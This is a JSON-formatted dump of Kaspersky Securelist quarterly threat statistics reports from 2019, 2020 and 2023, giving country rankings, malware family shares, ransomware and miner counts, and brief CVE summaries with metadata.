| Belarus | 16.46 \n10 | Ukraine | 16.18 \n11 | France | 15.84 \n12 | Philippines | 15.46 \n13 | Armenia | 15.40 \n14 | Tunisia | 15.29 \n15 | Bulgaria | 14.73 \n16 | Poland | 14.69 \n17 | R\u00e9union | 14.68 \n18 | Latvia | 14.65 \n19 | Peru | 14.50 \n20 | Qatar | 14.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.\n\n_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)\n\n### Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.\n\n#### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 55.43 \n2 | Tajikistan | 55.27 \n3 | Uzbekistan | 55.03 \n4 | Yemen | 52.12 \n5 | Turkmenistan | 50.75 \n6 | Laos | 46.12 \n7 | Syria | 46.00 \n8 | Myanmar | 45.61 \n9 | Mongolia | 45.59 \n10 | Ethiopia | 44.95 \n11 | Bangladesh | 44.11 \n12 | Iraq | 43.79 \n13 | China | 43.60 \n14 | Bolivia | 43.47 \n15 | Vietnam | 43.22 \n16 | Venezuela | 42.71 \n17 | Algeria | 42.33 \n18 | Cuba | 42.31 \n19 | Mozambique | 42.14 \n20 | Rwanda | 42.02 \n \n_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)\n\nOverall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.\n\nThe figure for Russia was 26.14%.", "cvss3": {}, "published": "2019-08-19T10:00:00", "type": "securelist", "title": "IT threat evolution Q2 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0798", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-0863", "CVE-2019-0973", "CVE-2019-10149", "CVE-2019-1069", "CVE-2019-11707", "CVE-2019-11708"], "modified": "2019-08-19T10:00:00", "id": "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "href": "https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T18:22:37", "description": "\n\n * [IT threat evolution in Q1 2023](<https://securelist.com/it-threat-evolution-q1-2023/109838/>)\n * **IT threat evolution in Q1 2023. Non-mobile statistics**\n * [IT threat evolution in Q1 2023. Mobile statistics](<https://securelist.com/it-threat-evolution-q1-2023-mobile-statistics/109893/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2023:\n\n * Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.\n * Web Anti-Virus detected 246,912,694 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 106,863 unique users.\n * Ransomware attacks were defeated on the computers of 60,900 unique users.\n * Our File Anti-Virus detected 43,827,839 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2023, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 106,863 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161548/01-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans or ATM/POS malware worldwide, for each country and territory, we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n**TOP 10 countries/territories by share of attacked users**\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries/territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country/territory._\n\n**TOP 10 banking malware families**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 28.9 \n2 | Emotet | Trojan-Banker.Win32.Emotet | 19.5 \n3 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 18.3 \n4 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 6.5 \n5 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.9 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 2.3 \n7 | IcedID | Trojan-Banker.Win32.IcedID | 1.9 \n8 | SpyEyes | Trojan-Spy.Win32.SpyEye | 1.6 \n9 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n10 | Qbot/Qakbot | Trojan-Banker.Win32.Qbot | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attacks on Linux and VMWare ESXi servers\n\nAn increasing number of ransomware families are extending their attack surfaces by adding support for operating systems other than Windows, which they have targeted traditionally. In Q1 2023, we discovered builds from several ransomware families intended for running on Linux and VMWare ESXi servers, namely: ESXiArgs (new family), Nevada (a rebranding of Nokoyawa, which is written in Rust), Royal, IceFire.\n\nThus, the arsenals of most professional extortion groups today include ransomware builds designed for several platforms, thus maximizing the damage they can cause to their victims.\n\n#### Progress in combating cybercrime\n\n[Europol](<https://www.europol.europa.eu/media-press/newsroom/news/cybercriminals-stung-hive-infrastructure-shut-down>) and the [U.S. Department of Justice](<https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant>) announced that as a result of a joint operation with the FBI that started in July 2022, the FBI penetrated networks belonging to the Hive group and obtained decryption keys for more than 1,300 victims. The law enforcement agencies also obtained information about 250 Hive affiliates and seized several servers belonging to the group.\n\nThe Netherlands Police [arrested](<https://www.bleepingcomputer.com/news/security/dutch-police-arrest-three-ransomware-actors-extorting-25-million/>) [three individuals](<https://www.politie.nl/nieuws/2023/februari/23/05-drie-mannen-aangehouden-in-onderzoek-naar-grootschalige-internationale-datadiefstal-en-datahandel.html>) suspected of stealing confidential data and extorting \u20ac100,000 to \u20ac700,000 from each victim company.\n\nEuropol [announced](<https://www.europol.europa.eu/media-press/newsroom/news/germany-and-ukraine-hit-two-high-value-ransomware-targets>) it had arrested two suspected core members of DoppelPaymer during a [joint operation](<https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/>) with the FBI and the law enforcement agencies of Germany, Ukraine, and the Netherlands. The team also seized hardware, which the law enforcement agencies will inspect during further investigation.\n\n#### Conti-based Trojan decrypted\n\nKaspersky analysts [released](<https://usa.kaspersky.com/about/press-releases/2023_kaspersky-releases-tool-for-decrypting-conti-based-ransomware>) a utility for decrypting files affected by a Trojan known to researchers as MeowCorp. The malware was compiled from Conti source code, which was published last year. An archive containing the secret keys, 258 in all, was posted on an online forum. We added these, along with data decryption code, to the [latest version of RakhniDecryptor](<https://support.kaspersky.com/common/disinfection/10556>).\n\n## Most prolific groups\n\nThis section looks at ransomware groups that engage in so-called "double extortion", that is stealing confidential data in addition to encrypting it. Most of these groups target large companies, and many maintain a DLS (data leak site), where they publish a list of organizations they have attacked. The diagram below reflects the most prolific extortion gangs, that is, the ones that added the largest numbers of victims to their DLSs.\n\n_Most prolific ransomware gangs. The diagram shows each group's share of victims out of the total number of victims published on all the groups' DLSs in Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161701/02-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Number of new modifications\n\nIn Q1 2023, we detected nine new ransomware families and 3089 new modifications of the malware of this type.\n\n_Number of new ransomware modifications, Q1 2022 \u2014 Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161738/03-en-ru-es-malware-report-q1-2023-pc-statistics.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2023, Kaspersky products and technologies protected 60,900 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161811/04-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Geography of attacked users\n\n**TOP 10 countries/territories attacked by ransomware Trojans**\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Yemen | 1.50 \n2 | Bangladesh | 1.47 \n3 | Taiwan | 0.65 \n4 | Mozambique | 0.59 \n5 | Pakistan | 0.47 \n6 | South Korea | 0.42 \n7 | Venezuela | 0.32 \n8 | Iraq | 0.30 \n9 | Nigeria | 0.30 \n10 | Libya | 0.26 \n \n_* Excluded are countries/territories with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country/territory._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Magniber | Trojan-Ransom.Win64.Magni / Trojan-Ransom.Win32.Magni | 15.73 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.40 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.27 \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.77 \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 6.65 \n6 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.52 \n7 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 5.90 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.74 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 3.52 \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 2.06 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2023, Kaspersky solutions detected 1733 new modifications of miners.\n\n_Number of new miner modifications, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161841/05-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 403,211 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06161916/06-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries/territories attacked by miners**\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Tajikistan | 2.87 \n2 | Kazakhstan | 2.52 \n3 | Uzbekistan | 2.30 \n4 | Kyrgyzstan | 2.18 \n5 | Belarus | 1.80 \n6 | Venezuela | 1.77 \n7 | Ethiopia | 1.73 \n8 | Ukraine | 1.73 \n9 | Mozambique | 1.63 \n10 | Rwanda | 1.50 \n \n_* Excluded are countries/territories with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country/territory._\n\n## Vulnerable applications used in cyberattacks\n\n### Quarterly highlights\n\nQ1 2023 saw a number of Windows vulnerabilities remediated and published. Some of those were the following:\n\n * [CVE-2023-23397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-23397>): probably the most high-profile vulnerability, which provoked much online debate and discussion. This Windows vulnerability allows starting automatic authentication on behalf of the user on a host running Outlook.\n * [CVE-2023-21674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-21674>): a vulnerability in the ALPC subsystem that allows a malicious actor to escalate their privileges to system level.\n * [CVE-2023-21823](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-21823>): a Windows Graphics Component vulnerability that allows running commands in the system on behalf of the user. This can be reproduced both in Windows desktop versions of Microsoft Office and in mobile (iOS and Android) versions.\n * [CVE-2023-23376](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-23376>): a Common Log File System Driver vulnerability that allows escalating privileges to system level.\n * [\u0421VE-2023-21768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-21768>): a vulnerability in the Ancillary Function Driver for WinSock that allows obtaining system privileges.\n\nA Microsoft fix for each of the vulnerabilities is out, and we strongly encourage you to install all the relevant patches.\n\nThe main network threats in Q1 2023 were [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks on MSSQL and RDP services. EternalBlue and EternalRomance remained popular exploits for operating system vulnerabilities. We detected notably large numbers of attacks and scans that targeted log4j-type vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>)).\n\n### Vulnerability statistics\n\nIn Q1 2023, Kaspersky products detected more than 300,000 exploitation attempts, most of these using Microsoft Office exploits. Their share was 78.96%, down by just 1 p.p. from the previous quarter. The most-exploited vulnerabilities in that category were the following:\n\n * [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>): Equation Editor vulnerabilities that allow corrupting application memory during formula processing to then run arbitrary code in the system.\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) that allows using MS Office to load malicious scripts.\n * [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) that allows loading malicious HTA scripts into the system.\n\nThe second most-exploited category were browser vulnerabilities (7.07%), their share growing by 1 p.p. We did not discover any new browser vulnerabilities exploited by malicious actors in the wild. Q2 2023 might bring something new.\n\n_Distribution of exploits used by cybercriminals by type of attacked application, Q1 2023 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06162000/07-en-malware-report-q1-2023-pc-statistics.png>))_\n\nAndroid (4.04%) and Java (3.93%) were third and fourth, respectively. Android exploits lost 1 p.p. during the period, whereas the share of Java exploits remained unchanged. The fifth- and sixth-place scores \u2014 Adobe Flash (3.49%) and PDF (2.52%) \u2014 were very close to the previous quarter's figures as well.\n\n## Attacks on macOS\n\nThe first quarter's high-profile event was a [supply-chain attack on the 3CX app](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack>), including the macOS version. Hackers were able to embed malicious code into the libffmpeg media processing library to download a payload from their servers.\n\nWorth noting is the [MacStealer spy program](<https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware>), also discovered in Q1 2023, which stole cookies from the victim's browser, as well as account details and cryptowallet passwords.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 11.87 \n2 | AdWare.OSX.Amc.e | 8.41 \n3 | AdWare.OSX.Pirrit.j | 7.98 \n4 | AdWare.OSX.Agent.ai | 7.58 \n5 | Monitor.OSX.HistGrabber.b | 6.64 \n6 | AdWare.OSX.Bnodlero.ax | 6.12 \n7 | AdWare.OSX.Pirrit.ae | 5.77 \n8 | AdWare.OSX.Agent.gen | 4.98 \n9 | Hoax.OSX.MacBooster.a | 4.76 \n10 | Trojan-Downloader.OSX.Agent.h | 4.66 \n11 | AdWare.OSX.Pirrit.o | 3.63 \n12 | Backdoor.OSX.Twenbc.g | 3.52 \n13 | AdWare.OSX.Bnodlero.bg | 3.32 \n14 | AdWare.OSX.Pirrit.aa | 3.20 \n15 | Backdoor.OSX.Twenbc.h | 3.14 \n16 | AdWare.OSX.Pirrit.gen | 3.14 \n17 | Downloader.OSX.InstallCore.ak | 2.37 \n18 | Trojan-Downloader.OSX.Lador.a | 2.03 \n19 | RiskTool.OSX.Spigot.a | 1.92 \n20 | Trojan.OSX.Agent.gen | 1.88 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security products for macOS who were attacked._\n\nAdware remained the most widespread threat to macOS users. In addition to that, we frequently came across all kinds of system "cleaners" and "optimizers", many of these containing highly annoying ads or classic scams, where users were offered to buy solutions to problems that did not exist.\n\n### Geography of threats for macOS\n\n**\u0422\u041e\u0420 10 countries/territories by share of attacked users**\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Italy | 1.43 \n2 | Spain | 1.39 \n3 | France | 1.37 \n4 | Russian Federation | 1.29 \n5 | Mexico | 1.20 \n6 | Canada | 1.18 \n7 | United States | 1.16 \n8 | United Kingdom | 0.98 \n9 | Australia | 0.87 \n10 | Brazil | 0.81 \n \n_* Excluded from the rankings are countries/territories with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky macOS security products in the country/territory._\n\nItaly (1.43%) and Spain (1.39%) became the leaders by number of attacked users, as France (1.37%), Russia (1.29%) and Canada (1.18%) lost a few percentage points. Overall, the percentage of attacked users in the TOP 10 countries did not change much.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2023, a majority of the devices that attacked Kaspersky honeypots still used the Telnet protocol, but its popularity decreased somewhat from the previous quarter.\n\nTelnet | 69.2% \n---|--- \nSSH | 30.8% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q1 2023_\n\nIn terms of session numbers, Telnet accounted for the absolute majority.\n\nTelnet | 97.8% \n---|--- \nSSH | 2.2% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2023_\n\n**TOP 10 countries/territories as sources of SSH attacks**\n\n**Country/territory** | **%* (Q4 2022)** | **%* (Q1 2023)** \n---|---|--- \nTaiwan | 1.60 | 12.13 \nUnited States | 19.11 | 12.05 \nSouth Korea | 3.32 | 7.64 \nMainland China | 8.45 | 6.80 \nBrazil | 5.10 | 5.08 \nIndia | 6.26 | 4.45 \nGermany | 6.20 | 4.00 \nVietnam | 2.18 | 3.95 \nSingapore | 6.63 | 3.63 \nRussian Federation | 3.33 | 3.36 \nOther | 37.81 | 36.91 \n \n_* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where SSH attacks on Kaspersky honeypots originated._\n\nThe APAC countries/territories and the U.S. remained the main sources of SSH attacks in Q1 2023.\n\n**TOP 10 countries/territories as sources of SSH attacks**\n\n**Country/territory** | **%* (Q4 2022)** | **%* (Q1 2023)** \n---|---|--- \nMainland China | 46.90 | 39.92 \nIndia | 6.61 | 12.06 \nTaiwan | 6.37 | 7.51 \nBrazil | 3.31 | 4.92 \nRussian Federation | 4.53 | 4.82 \nUnited States | 4.33 | 4.30 \nSouth Korea | 7.39 | 2.59 \nIran | 1.05 | 1.50 \nPakistan | 1.40 | 1.41 \nKenya | 0.06 | 1.39 \nOther | 18.04 | 19.58 \n \n_* Unique IP addresses located in a country/territory as a percentage of all unique IP addresses where Telnet attacks on Kaspersky honeypots originated._\n\nMainland China (39.92%) remained the largest source of Telnet attacks, with India's (12.06%) and Kenya's (1.39%) contributions increasing significantly. The share of attacks that originated in South Korea (2.59%) decreased.\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 41.39% \n2 | Backdoor.Linux.Mirai.b | 18.82% \n3 | Backdoor.Linux.Mirai.cw | 9.63% \n4 | Backdoor.Linux.Mirai.ba | 6.18% \n5 | Backdoor.Linux.Gafgyt.a | 2.64% \n6 | Backdoor.Linux.Mirai.fg | 2.25% \n7 | Backdoor.Linux.Mirai.ew | 1.89% \n8 | Trojan-Downloader.Shell.Agent.p | 1.77% \n9 | Backdoor.Linux.Gafgyt.bj | 1.24% \n10 | Trojan-Downloader.Linux.Mirai.d | 1.23% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries/territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country/territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2023, Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. A total of 246,912,694 unique URLs were detected as malicious by Web Anti-Virus.\n\n_Distribution of web-attack sources across countries, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/06/06162039/08-en-malware-report-q1-2023-pc-statistics.png>))_\n\n### Countries/territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in various countries/territories, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered at least once during the quarter in each country/territory. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in various countries.\n\nNote that these rankings only include attacks by malicious objects that fall under the _**Malware** class;_ they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Turkey | 16.88 \n2 | Taiwan | 16.01 \n3 | Algeria | 15.95 \n4 | Palestine | 15.30 \n5 | Albania | 14.95 \n6 | Yemen | 14.94 \n7 | Serbia | 14.54 \n8 | Tunisia | 14.13 \n9 | South Korea | 13.98 \n10 | Libya | 13.93 \n11 | Sri Lanka | 13.85 \n12 | Greece | 13.53 \n13 | Syria | 13.51 \n14 | Nepal | 13.10 \n15 | Bangladesh | 12.92 \n16 | Georgia | 12.85 \n17 | Morocco | 12.80 \n18 | Moldova | 12.73 \n19 | Lithuania | 12.61 \n20 | Bahrein | 12.39 \n \n_* Excluded are countries/territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country/territory._\n\nOn average during the quarter, 9.73% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2023, our File Anti-Virus detected 43,827,839 malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country/territory, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries/territories.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country/territory*** | **%**** \n---|---|--- \n1 | Yemen | 45.38 \n2 | Turkmenistan | 44.68 \n3 | Afghanistan | 43.64 \n4 | Tajikistan | 42.57 \n5 | Cuba | 36.01 \n6 | Burundi | 35.20 \n7 | Syria | 35.17 \n8 | Bangladesh | 35.07 \n9 | Myanmar | 34.98 \n10 | Uzbekistan | 34.22 \n11 | South Sudan | 34.06 \n12 | Rwanda | 34.01 \n13 | Algeria | 33.94 \n14 | Guinea | 33.74 \n15 | Cameroon | 33.09 \n16 | Sudan | 33.06 \n17 | Chad | 33.06 \n18 | Tanzania | 32.50 \n19 | Benin | 32.42 \n20 | Malawi | 31.93 \n \n_* Excluded are countries/territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory._\n\nOn average worldwide, Malware-class local threats were registered on 15.22% of users' computers at least once during Q3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-07T08:00:18", "type": "securelist", "title": "IT threat evolution in Q1 2023. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-44228", "CVE-2023-21674", "CVE-2023-21768", "CVE-2023-21823", "CVE-2023-23376", "CVE-2023-23397"], "modified": "2023-06-07T08:00:18", "id": "SECURELIST:F62AEEAB0355FAC92D225F808BBF00CD", "href": "https://securelist.com/it-threat-evolution-q1-2023-pc-statistics/109917/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-03T13:05:29", "description": "\n\n**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>) \n[IT threat evolution Q2 2020. Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2:\n\n * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.\n * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.\n * Ransomware attacks were defeated on the computers of 154,720 unique users.\n * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.\n\n_Number of unique users attacked by financial malware, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Geography of attacks**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 7.5 \n2 | Uzbekistan | 5.7 \n3 | Tajikistan | 5.6 \n4 | Afghanistan | 2.6 \n5 | Macedonia | 2.6 \n6 | Yemen | 2.2 \n7 | Syria | 1.9 \n8 | Kazakhstan | 1.7 \n9 | Cyprus | 1.7 \n10 | Iran | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._\n\nAmong the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet's activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 24.8 | \n2 | RTM | Trojan-Banker.Win32.RTM | 18.6 | \n3 | CliptoShuffler | 